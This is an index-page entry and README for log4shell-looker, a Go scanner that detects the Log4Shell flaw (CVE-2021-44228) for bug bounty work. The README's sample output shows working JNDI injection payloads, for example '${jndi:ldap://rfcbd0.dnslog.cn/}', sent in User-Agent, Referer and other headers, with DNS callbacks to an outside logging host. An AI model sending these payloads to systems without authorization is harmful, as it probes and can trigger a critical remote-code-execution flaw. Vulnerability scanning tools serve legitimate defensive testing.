Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/ravro-ir/log4shell-looker
log4jshell vulnerability scanner for bug bounty
https://github.com/ravro-ir/log4shell-looker
bugbounty bugs java java-8 log4j log4j2 log4shell logger logging secuurity vulnerabilities vulnerability vulnerability-detection vulnerability-scanners
Last synced: about 1 month ago
JSON representation
log4jshell vulnerability scanner for bug bounty
- Host: GitHub
- URL: https://github.com/ravro-ir/log4shell-looker
- Owner: ravro-ir
- Created: 2021-12-16T06:44:02.000Z (almost 3 years ago)
- Default Branch: main
- Last Pushed: 2021-12-21T02:09:31.000Z (over 2 years ago)
- Last Synced: 2024-06-19T02:08:20.520Z (3 months ago)
- Topics: bugbounty, bugs, java, java-8, log4j, log4j2, log4shell, logger, logging, secuurity, vulnerabilities, vulnerability, vulnerability-detection, vulnerability-scanners
- Language: Go
- Homepage:
- Size: 188 KB
- Stars: 23
- Watchers: 1
- Forks: 4
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - ravro-ir/log4shell-looker - log4jshell vulnerability scanner for bug bounty (Go)
README
## log4shell-looker a log4jshell vulnerability scanner for bug bounty
(Written in Go because, you know, "write once, run anywhere.")
This is a simple tool that can be used to find vulnerable instances of
log4j 1.x and 2.x (CVE-2021-44228) in installations of
Java software such as web applications.
The scan tool currently checks for discover log4shell vulnerability.
Current feature of tools:
`Cookies`, `Content-Type`, `URL Path`, `User-Agent`, `Headers`
# Using the scanner
```bash
$ go run main.go --help
Usage of main:
-mode string
please usage mode [urlpath, header, useragent] (default "[urlpath, header, useragent, cookie, contents]")
-url string
please enter you url for scan (default "url")
$ go run main.go -mode=useragent -url=http://127.0.0.1:8080
[+++] Your domain generated : rfcbd0.dnslog.cn
[+++] Your session is : 1s16v8k8fmrmd5rljun51lmur4
[***] Payload : User-Agent:${jndi:ldap://rfcbd0.dnslog.cn/}
[---] Isn't to vulnerability CVE-2021-44228
#################### 0 ############################
[+++] Your domain generated : rfcbd0.dnslog.cn
[+++] Your session is : 1s16v8k8fmrmd5rljun51lmur4
[***] Payload : Referer:${jndi:ldap://rfcbd0.dnslog.cn/}
[---] Isn't to vulnerability CVE-2021-44228
#################### 2 ############################
[+++] Your domain generated : rfcbd0.dnslog.cn
[+++] Your session is : 1s16v8k8fmrmd5rljun51lmur4
[***] Payload : X-Api-Version:${jndi:ldap://rfcbd0.dnslog.cn/}
[***] DNS log result : [["rfcbd0.dnslog.cn","172.253.238.4","2021-12-16 14:45:19"]]
[***] Is Vulnerability to CVE-2021-44228 - [critical]
```
# Building from source
Install a [Go compiler](https://golang.org/dl).
Run the following commands in the checked-out repository:
```
go run main.go -mode=header -url=https://www.example.com/
Or
go build -o main
```
(Add the appropriate `.exe` extension on Windows systems, of course.)
# Example
```bash
$ go run main.go -mode=header -url=http://127.0.0.1:8080/
```
```bash
$ go run main.go -mode=useragent -url=http://127.0.0.1:8080/
```
```bash
$ go run main.go -mode=cookie -url=http://127.0.0.1:8080/
```
```bash
$ go run main.go -mode=urlpath -url=http://127.0.0.1:8080/
```
```bash
$ go run main.go -mode=contents -url=http://127.0.0.1:8080/
```
# License
GNU General Public License, version 3
# Author
Ramin Farajpour Cami <>